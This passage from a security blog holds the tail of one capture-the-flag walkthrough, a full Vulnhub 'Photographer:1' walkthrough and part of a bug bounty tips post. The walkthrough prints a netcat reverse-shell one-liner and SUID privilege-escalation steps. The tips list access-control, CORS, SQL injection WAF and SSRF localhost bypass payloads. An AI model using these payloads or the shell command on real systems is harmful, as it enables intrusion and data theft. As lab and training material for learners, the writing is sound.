it and you will get OpenSSH private key.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivbDQDD61rV-SmPthyGTOiZ5Q3QeiFDHTNfx3RVJKb7-tCHKxUYDYWX1moBYjBf_6yfwPxoF9cYOWFAZdasrM_NdpKfHhk8t-Q0ChoBzyb1ilzTyhfoow0mu2fE9O_7vjL4DP-yDlYE7I/s773/base64+decode.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="692" data-original-width="773" height="716" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivbDQDD61rV-SmPthyGTOiZ5Q3QeiFDHTNfx3RVJKb7-tCHKxUYDYWX1moBYjBf_6yfwPxoF9cYOWFAZdasrM_NdpKfHhk8t-Q0ChoBzyb1ilzTyhfoow0mu2fE9O_7vjL4DP-yDlYE7I/w800-h716/base64+decode.PNG" width="800" /></a></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div>4. Save decoded data in a text file. Use following command to connect on port 22.<br /></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5kuq4A8yWg3h2cYJWXIgKqdc1bPclB7A91ZXFxpd7nzr3oXvPYjXFYGQ_9LXHfFcBlRShZtrzjlQ07g-ljhpIV5fGl_sY4z9YXIQkpiojsqcQ6kN_JETEDl9T6QJ5hYxmjj86Jt-Ofg4/s998/ssh.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="476" data-original-width="998" height="381" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5kuq4A8yWg3h2cYJWXIgKqdc1bPclB7A91ZXFxpd7nzr3oXvPYjXFYGQ_9LXHfFcBlRShZtrzjlQ07g-ljhpIV5fGl_sY4z9YXIQkpiojsqcQ6kN_JETEDl9T6QJ5hYxmjj86Jt-Ofg4/w800-h381/ssh.PNG" width="800" /></a></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div>5. Host a local server using python and transfer LinEnum.sh on target machine. After running LinEnum.sh, we noticed SUID set for bash.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjfHqrkioc-blZso2oYks30JKGUJNmFQJ2-oE3lBLgwLK8r2V8eoCa8BRmaXLomKG8e1qB6MGw8e8g6OlvfbVK4azDGZtTH0j0ci5uktk_9e9QZi3-TWJRe-W-jndwfaSU0DRLTM7XoP0/s633/SUID+bash.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="74" data-original-width="633" height="93" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjfHqrkioc-blZso2oYks30JKGUJNmFQJ2-oE3lBLgwLK8r2V8eoCa8BRmaXLomKG8e1qB6MGw8e8g6OlvfbVK4azDGZtTH0j0ci5uktk_9e9QZi3-TWJRe-W-jndwfaSU0DRLTM7XoP0/w791-h93/SUID+bash.PNG" width="791" /></a></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div>6. After exploiting SUID, we got our flag.txt in root directory.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6C3NpYKSbIP8C_P_TrKvfAjLZSNdt0IEiuyPR67bb7PAa8yoy5ocQvHsGK013G6dWHt73KLHj853CGrRzPCzYcOILL4ozMFxwwfmtUZ2fIpVJ_f6ISkx0YCSUggVaq49PhyphenhyphenOA9fOz7vw/s1374/bash+suid.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="157" data-original-width="1374" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6C3NpYKSbIP8C_P_TrKvfAjLZSNdt0IEiuyPR67bb7PAa8yoy5ocQvHsGK013G6dWHt73KLHj853CGrRzPCzYcOILL4ozMFxwwfmtUZ2fIpVJ_f6ISkx0YCSUggVaq49PhyphenhyphenOA9fOz7vw/w800-h91/bash+suid.PNG" width="800" /></a></div><div><br /></div><div> </div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div>Now, submit your flag on Discord server. <br /></div><div>Link: <a href="https://discord.gg/RRgKaep">https://discord.gg/RRgKaep</a></div><div><br /></div><div>Thanks for reading till the end! 😊<br /></div>Latish Danawalehttp://www.blogger.com/profile/00084840439148244930noreply@blogger.com2tag:blogger.com,1999:blog-1382879664613470931.post-70317055104429751942020-08-06T09:07:00.001-07:002020-08-06T09:07:27.673-07:00Photographer:1 Walkthrough - Vulhnub<div>This machine was developed to prepare for OSCP. It is boot2root challenge. Let's begin!</div><div><br /></div><div>Target IP: 10.0.2.11</div><div><br /></div><div>1. Results of nmap scan. <br /></div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpjUUyk801Fi-qFgWIZDtGZ1Dh2wm0kMncQjoDESmaPoDRS5cTYY2XG_6ynMq7f9n0dz9TjaVorEsgRUx7T_1DNeOKf9VSs6cebPSEGN39xIGZZAMD3rekPdCpWKUwpjKRuhpfbXMq13Q/s975/nmap.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="429" data-original-width="975" height="353" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpjUUyk801Fi-qFgWIZDtGZ1Dh2wm0kMncQjoDESmaPoDRS5cTYY2XG_6ynMq7f9n0dz9TjaVorEsgRUx7T_1DNeOKf9VSs6cebPSEGN39xIGZZAMD3rekPdCpWKUwpjKRuhpfbXMq13Q/w800-h353/nmap.PNG" width="800" /></a></div><div>2. We noticed that on port 80 and 8000 http service is running. Also on 445 Samba smbd.</div><div><br /></div><div>3. Let's visit port 80.</div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHGe4Cn6W9HZpbDtT2kIN70s8HTvjX7eRhwkr4gNdKPVMuNgjyKhvhQIFBFeRMw_3bWCh2MdJnRswb0hwllJIz7veb735ebpWBo-hK-r_1s7MduL8GU2c1bRd_bPxvcqDrZHli812kqkw/s1917/blog.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="879" data-original-width="1917" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHGe4Cn6W9HZpbDtT2kIN70s8HTvjX7eRhwkr4gNdKPVMuNgjyKhvhQIFBFeRMw_3bWCh2MdJnRswb0hwllJIz7veb735ebpWBo-hK-r_1s7MduL8GU2c1bRd_bPxvcqDrZHli812kqkw/w800-h366/blog.PNG" width="800" /></a></div><div>4. After performing directory fuzzing we didn't find anything sensitive. It's time to explore next port which is port 8000. At the bottom of the page it's disclosing the CMS name which is Koken. Koken CMS is vulnerable to Authenticated RCE. But in order to exploit it, we will require admin credentials. <br /></div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd5kIb9xkFKEf6NchHtYGxket3L00pHuOz3GiSQLnKQJVFtfY99KPD7V02Q_RyekHuiFS0tvi67fjp03n_Lplih9f1KbSf5c8MaJuV6hVkZq2MtC_zMeVj_zwRG35xoBzBwBFLYq3QLpE/s1920/port+8000.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="591" data-original-width="1920" height="246" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd5kIb9xkFKEf6NchHtYGxket3L00pHuOz3GiSQLnKQJVFtfY99KPD7V02Q_RyekHuiFS0tvi67fjp03n_Lplih9f1KbSf5c8MaJuV6hVkZq2MtC_zMeVj_zwRG35xoBzBwBFLYq3QLpE/w800-h246/port+8000.PNG" width="800" /></a></div><div><br /></div><div>5. Wfuzz gave us /admin/ directory through which we can login. Still creds required :(</div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVMsi9s35jotNWnyNWaNVYl5TxdJzjf31l-WCOhbWkpiqCKqB18NyLIoubDmYM890-s8sySOxuq0uisN25QGSMynIE9-AdOxCs7_jhbDaF6-BGxCEEz9YTpPR6rvQUcPvH22MLk5CM89U/s1617/wfuzz.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="729" data-original-width="1617" height="361" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVMsi9s35jotNWnyNWaNVYl5TxdJzjf31l-WCOhbWkpiqCKqB18NyLIoubDmYM890-s8sySOxuq0uisN25QGSMynIE9-AdOxCs7_jhbDaF6-BGxCEEz9YTpPR6rvQUcPvH22MLk5CM89U/w800-h361/wfuzz.PNG" width="800" /></a></div><div><br /></div><div>6. Now we can connect to smb share on port 445. After connecting on port 445 we noticed two files. <br /></div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjdy02TMMKI9zVZrH8QY3yV6IWKsfKeEh_MpLrcYZf5tHL32rHoH9W6vmeWA587zPyACbZSzjvI5AnFB2XDVFowmyNQiuQP7CkSXig6oe1BmYeWO4IAljPdeg5m5ftBZa_LbsAKvVbOpk/s847/smb+connect.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="208" data-original-width="847" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjdy02TMMKI9zVZrH8QY3yV6IWKsfKeEh_MpLrcYZf5tHL32rHoH9W6vmeWA587zPyACbZSzjvI5AnFB2XDVFowmyNQiuQP7CkSXig6oe1BmYeWO4IAljPdeg5m5ftBZa_LbsAKvVbOpk/w800-h196/smb+connect.PNG" width="800" /></a></div><div><br /></div><div>7. mailsent.txt file reveals user Daisa's email address and indicating a secret "babygirl" which can be used as a password to login into Koken application.<br /></div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJoDmzC7pdFz6lOP5l1W2WsK8VdCu_IetTIqbpjRFhV81VDn1EZI5V3uB_GLgbbZuaCUIQLHqaxG4W5nT53EmWTac0lmgld4vyIvZLrnERR5uOeTIspHvzNeAFi6BG5-Kvs_XhKiwr08Q/s988/Mail+hint+babygirl+password.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="290" data-original-width="988" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJoDmzC7pdFz6lOP5l1W2WsK8VdCu_IetTIqbpjRFhV81VDn1EZI5V3uB_GLgbbZuaCUIQLHqaxG4W5nT53EmWTac0lmgld4vyIvZLrnERR5uOeTIspHvzNeAFi6BG5-Kvs_XhKiwr08Q/w800-h235/Mail+hint+babygirl+password.PNG" width="800" /></a></div><div><br /></div><div>8. Success! Now we can login into Koken admin panel. After browsing to Console section we notived version 0.22.24 which is vulnerable to RCE.</div><div>Exploit Link: <a href="https://www.exploit-db.com/exploits/48706">https://www.exploit-db.com/exploits/48706</a><br /></div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGg7icFe0bGjErNVN-FBMF2-0bFyVkZMXWicovncf-lTrxN-l5ZIsS_s9pF5e7Vs58V-3HG1b4xroUHWCnTq74Tth6-Lput1V-bp8rxvvrP-USIT2HRkXXOqpqxBvRzCE8qjrrHYezWj8/s1918/koken+version.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="596" data-original-width="1918" height="249" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGg7icFe0bGjErNVN-FBMF2-0bFyVkZMXWicovncf-lTrxN-l5ZIsS_s9pF5e7Vs58V-3HG1b4xroUHWCnTq74Tth6-Lput1V-bp8rxvvrP-USIT2HRkXXOqpqxBvRzCE8qjrrHYezWj8/w800-h249/koken+version.PNG" width="800" /></a></div><div>9. After successful exploitation you will get a shell.</div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhveZba9ZDZ_4fpqJ4_e9Qt5ZPxAQpcF9vPagzSiSrP9ivtC2_cg2OaDJrfBPSoBI4M9r9sOKoyGYch_DSEOGHFe-cbRotNaQwj_UNgzb7ZDPgS2M8214Aa9JsBJv9JcpxZAV_6jtcx9L0/s1919/Shell+uploaded.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="131" data-original-width="1919" height="69" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhveZba9ZDZ_4fpqJ4_e9Qt5ZPxAQpcF9vPagzSiSrP9ivtC2_cg2OaDJrfBPSoBI4M9r9sOKoyGYch_DSEOGHFe-cbRotNaQwj_UNgzb7ZDPgS2M8214Aa9JsBJv9JcpxZAV_6jtcx9L0/w1000-h69/Shell+uploaded.PNG" width="1000" /></a></div><div><br /></div><div>10. Use following one liner to receive a reverse shell on your system.</div><div><pre>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f<br /></pre><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc71Ih7VJh-pm0FDQBcT9ZR_nKLzhSHBbg_qgLvqbMYKW_6vcl5z_9YFIBlX8xqn9lq8SbZtAWYp1STX5mn63jdAGoujTmv5t6mjsgnWtRa48IcEXbkSE4LWF1OhsZ1bNeapfEMIbJ5Js/s1923/reverse+connection+burp.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="617" data-original-width="1923" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc71Ih7VJh-pm0FDQBcT9ZR_nKLzhSHBbg_qgLvqbMYKW_6vcl5z_9YFIBlX8xqn9lq8SbZtAWYp1STX5mn63jdAGoujTmv5t6mjsgnWtRa48IcEXbkSE4LWF1OhsZ1bNeapfEMIbJ5Js/w1000-h320/reverse+connection+burp.PNG" width="1000" /><br /></a></div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEix2Hnex92mDHt2F50FrELnnC1F2DNWOoZx0565COuDGv99cGR2jOek3Pv-HLce0wThNsQifzaPuB6HmRZWTWduSdhInnC28FVtlBqpK2ILBwOW9iPZjIsDvoR55MQLMfqlrMSBd3LItVs/s663/reverse+connection+burp+1.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="185" data-original-width="663" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEix2Hnex92mDHt2F50FrELnnC1F2DNWOoZx0565COuDGv99cGR2jOek3Pv-HLce0wThNsQifzaPuB6HmRZWTWduSdhInnC28FVtlBqpK2ILBwOW9iPZjIsDvoR55MQLMfqlrMSBd3LItVs/w640-h179/reverse+connection+burp+1.PNG" width="640" /></a></div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both;">11. We can read user.txt now!</div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH8Wgdo7jJ_HOvUdfOHutICiQs3vfvjmzOoGJdMiF3VE7Ej4ziVLpUm1ZsBQ2VNc2Pu2fmQZzD0zp2WylqKwFz3iUlZKPPdsIl6Dyuk6DUqGmQNpWoUF1Z2xVp-YHs2wqucaUJNk_JARE/s651/user+flag+done.png" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="251" data-original-width="651" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH8Wgdo7jJ_HOvUdfOHutICiQs3vfvjmzOoGJdMiF3VE7Ej4ziVLpUm1ZsBQ2VNc2Pu2fmQZzD0zp2WylqKwFz3iUlZKPPdsIl6Dyuk6DUqGmQNpWoUF1Z2xVp-YHs2wqucaUJNk_JARE/w640-h247/user+flag+done.png" width="640" /></a></div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both;">12. Running LinEnum.sh reveals that SUID bit set for php</div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYPceYKvJ5rY2oCUku21K0RuMDRTQ-CkQB678RoHZLPf9O9YPNeYHaPyG7cTeaHF8UWtrxzXye3hnso41E4T7mfDyeEUH3SDq1aAFrW_8cmITS68A2wR_B1HZLM-tNKePs6N4cgEWrAT0/s935/SUID+php.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="465" data-original-width="935" height="398" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYPceYKvJ5rY2oCUku21K0RuMDRTQ-CkQB678RoHZLPf9O9YPNeYHaPyG7cTeaHF8UWtrxzXye3hnso41E4T7mfDyeEUH3SDq1aAFrW_8cmITS68A2wR_B1HZLM-tNKePs6N4cgEWrAT0/w800-h398/SUID+php.PNG" width="800" /><br /></a></div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both;">13. Used <a href="https://gtfobins.github.io/">GTFOBins</a> for reference.<br /></div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI9K8PZWVrpRhjSpRhSW9rC6w6uL0aMs-Cf83Vxz8Xue6_LPZWQXWpAG_7q5WjaauLkL7IlxN-TFNHstj8ViV6qhx8prQNll0r23evFmhG_mtBLJd_GNCrgFWRYWtOyWnTx6058Fum0Jg/s1038/SUID.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="370" data-original-width="1038" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI9K8PZWVrpRhjSpRhSW9rC6w6uL0aMs-Cf83Vxz8Xue6_LPZWQXWpAG_7q5WjaauLkL7IlxN-TFNHstj8ViV6qhx8prQNll0r23evFmhG_mtBLJd_GNCrgFWRYWtOyWnTx6058Fum0Jg/s640/SUID.PNG" width="640" /></a></div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both;">14. Rooted successfully!!!!<br /></div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE9z-EahnsBTmRO5Fw0eIgRf5B_riAHnh-Nfl7qlz0wE8IhCLhgHIfqlCyNCGh5xRiAJJgvZus3t7HOAvWWgcY2UuJNpS7Yalggs5NyglgjylLlcE2STkpc3O7GBosqfEYEHylC3Be1iQ/s784/Rooted+Machine.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="784" data-original-width="680" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE9z-EahnsBTmRO5Fw0eIgRf5B_riAHnh-Nfl7qlz0wE8IhCLhgHIfqlCyNCGh5xRiAJJgvZus3t7HOAvWWgcY2UuJNpS7Yalggs5NyglgjylLlcE2STkpc3O7GBosqfEYEHylC3Be1iQ/w555-h640/Rooted+Machine.PNG" width="555" /></a></div><div class="separator" style="clear: both;">Thanks for reading! 😄<br /></div></div>Latish Danawalehttp://www.blogger.com/profile/00084840439148244930noreply@blogger.com0tag:blogger.com,1999:blog-1382879664613470931.post-8525808753272436082020-07-28T16:49:00.003-07:002020-08-02T08:18:52.591-07:00#Bugbountytips<h3 style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcH7osrDFIYCjUbSElDijrhyOlIp4JS2ivG609U2HADv3uDmjBb-vGCemY9NmNehD-ugwmH1T_Da71DIKpYNz7wElaJumeGPrJwI6CkJsbdInhkk_LxDwDY3yhVfBU5rtSKBQ4lk1eAmo/s300/download.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="168" data-original-width="300" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcH7osrDFIYCjUbSElDijrhyOlIp4JS2ivG609U2HADv3uDmjBb-vGCemY9NmNehD-ugwmH1T_Da71DIKpYNz7wElaJumeGPrJwI6CkJsbdInhkk_LxDwDY3yhVfBU5rtSKBQ4lk1eAmo/w375-h210/download.jpg" width="375" /></a></div></h3><h3 style="text-align: left;"><span style="font-weight: normal;">Before you start reading this post, let me tell you all the tips are collected from twitter (few mine 😓) where awesome community folks share their knowledge and experience. I tried to mention every single twitter handle from where I refer the tips, in case your name missed out please reach out to me. 😉</span></h3><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><h3 style="text-align: left;"><font color="#ff0000">Authentication</font></h3><div># Access control vulnerabilities with blocked access can be bypassed by adding the X-Original-URL header.</div><div>POST /admin/deleteUser HTTP/1.1 -> 403</div><div><br /></div><div>POST / HTTP/1.1 </div><div>X-Original-URL: /admin/deleteUser -> 200OK </div><div><br /></div><div>Bypass Success!</div><div><br /></div><div># Accessing the Admin Panel</div><div>https://target.com/admin/ - 302</div><div>https://target.com/admin..;/ - 200</div><div><br /></div><h3 style="text-align: left;"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><font color="#ff0000">IDOR</font></span></h3><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">#Suppose you find endpoint </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">GET /api_v1/messages?user_id=Your_user_id</span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><br /></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Try</span></div><div>"GET /api v1/messages?user_id=Another_user_id"</div><div>"GET /api_v1/messages?user_id=Your_user_id&user_id=another_user_id"</div><div>"GET /api_v1/messages?user_id=another_user_id&user_id=Your_user_id"</div><div><br /></div><h3 style="text-align: left;"><font color="#ff0000">CORS</font></h3><div># CORS Protection RegEx Bypass</div><div>If the target only allows main-domain and subdomains, try to write something at the beginning of the main-domain.</div><div><br /></div><div>Origin: target.com --> Access-Control-Allow-Origin: target.com</div><div>Origin: eviltarget.com --> Not Vulnerable</div><div>Origin: sub.eviltarget.com --> Access-Control-Allow-Origin: sub.eviltarget.com</div><div><br /></div><h3 style="text-align: left;"><font color="#ff0000">SQL Injection</font></h3><div># If you ever stuck with SQL + WAF (IP based)</div><div>1. Make use of IP Rotate Extension in burp and configure with AWS creds</div><div>2. Use Sqlmap with --proxy flag to route traffic via burp</div><div>3. Bypass+1 Exploit+1 </div><h3 style="text-align: left;"><font color="#ff0000"><br /></font></h3><h3 style="text-align: left;"><font color="#ff0000">RCE</font></h3><div># Handy as hell tip for checking which functions you need to by pass on PHP </div><div><?php var_dump(explode(',',ini_get('disable_functions'))); ?></div><div><br /></div><div># <span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Parse </span><a class="r-1n1174f r-1loqt21 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0 css-4rbku5 css-18t94o4 css-901oao css-16my406" data-focusable="true" dir="ltr" href="https://t.co/hF4tw8MSp2?amp=1" rel="noopener noreferrer" role="link" target="_blank" title="http://cvedetails.com"><span aria-hidden="true" class="css-901oao css-16my406 r-1qd0xha r-hiw28u r-ad9z0x r-bcqeeo r-qvutc0">http://</span>cvedetails.com</a><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"> for scores 6+ going back 3 years for vulns. Visit the reference pages for web vulns in this filter. Grab the paths for those vulns. Build your own RCE word list.</span></div><h3 style="text-align: left;"><br /><font color="#ff0000">SSRF</font></h3><div># Bypass localhost IP blocked on SSRF</div><div>Create a subdomain and resolve it to 127.0.0.1 </div><div>You can also use post swagger subdomain, it's resolve to the localhost IP also: spoofed.burpcollaborator.net </div></div><div><br /></div><div># One liner command(both manual & automatic)</div><div><br /></div><div>Automatic One Liner SSRF:</div><div>assetfinder --subs-only target | httprobe | gau | gf ssrf | nuclei -t nuclei-templates/vulnerabilities/microstrategy-ssrf.yaml -o result.txt</div><div><br /></div><div>Manual testing SSRF:</div><div>assetfinder --subs-only target | httprobe | gau | gf ssrf | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk 2>/dev/null</div><div><br /></div><div>Then use burp collaborator to manipulate ssrf.</div><div><br /></div><div># Using IP Decimal to bypass '.' blacklisted character</div><div>Google IP: 216.58.212.110</div><div>Google IP Decimal: 3627734126</div><div>Example: target.com?redirect=http://3627734126 - Done</div><div><br /></div><div># Bypassing SSRF with CIDR</div><div>http://127.127.127.127</div><div>http://127.0.0.1</div><div><br /></div><div># Bypass using rare address</div><div>http://127.1</div><div>http://0/</div><div><br /></div><div># Bypass using tricks combination</div><div>http://1.1.1.1 &@2.2.2.2# @3.3.3.3/</div><div>urllib : 3.3.3.3</div><div><br /></div><div># Bypass against a weak parser</div><div>http://127.1.1.1:80\@127.2.2.2:80/</div><div><br /></div><div># Bypass localhost with [::]</div><div>http://[::]80/</div><div>http://0000::1:80/</div><div><br /></div><div># Sentry Blind SSRF</div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">1. cat aquatone/*/urls.txt | grep sentry </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">2. Burpsuite </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">3. Send it to Repeater </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">4. Change the value of filename: to a </span><a class="r-1n1174f r-1loqt21 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0 css-4rbku5 css-18t94o4 css-901oao css-16my406" data-focusable="true" dir="ltr" href="https://t.co/Zgp9fnpA7G?amp=1" rel="noopener noreferrer" role="link" target="_blank" title="http://postb.in"><span aria-hidden="true" class="css-901oao css-16my406 r-1qd0xha r-hiw28u r-ad9z0x r-bcqeeo r-qvutc0">http://</span>postb.in</a><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"> url (or similar) </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">5. Wait for a connection </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><br /></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"># </span>See a target running on Nginx?</div><div>GET <a class="css-4rbku5 css-18t94o4 css-901oao css-16my406 r-1n1174f r-1loqt21 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0" data-focusable="true" dir="ltr" href="https://twitter.com/xx" role="link">@xx</a><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">.collab.net/ or </span><a class="r-1n1174f r-1loqt21 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0 css-4rbku5 css-18t94o4 css-901oao css-16my406" data-focusable="true" dir="ltr" href="https://t.co/tU2OIGqyzz?amp=1" rel="noopener noreferrer" role="link" target="_blank" title="http://xxx.collaborator.net/"><span aria-hidden="true" class="css-901oao css-16my406 r-1qd0xha r-hiw28u r-ad9z0x r-bcqeeo r-qvutc0">http://</span>xxx.collaborator.net</a><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"> HTTP/1.1 </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Host: target[.]com </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><br /></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Always try for absolute urls. This has been affecting many apps. old is gold for ssrf.</span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><br /></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"># </span>A small Burpsuite trick which helped me to find Blind SSRF</div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">1: Use Intruder to Bruteforce Headers </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">2: Add Burp collaborator URL as value. </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">3: Add prefix numerical payload (Pitchfork) </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">4: Use Tarborator Extension to monitor hits</span></div><h3 style="text-align: left;"><font color="#ff0000"><br /></font></h3><h3 style="text-align: left;"><font color="#ff0000">Security Misconfiguation</font></h3><div># Easy way to find exposed production code: </div><div><span class="css-901oao css-16my406 r-1qd0xha 